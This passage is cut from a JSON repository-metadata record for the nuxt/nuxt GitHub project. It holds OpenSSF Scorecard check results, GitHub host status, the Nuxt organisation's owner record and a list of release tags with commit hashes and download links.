uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/t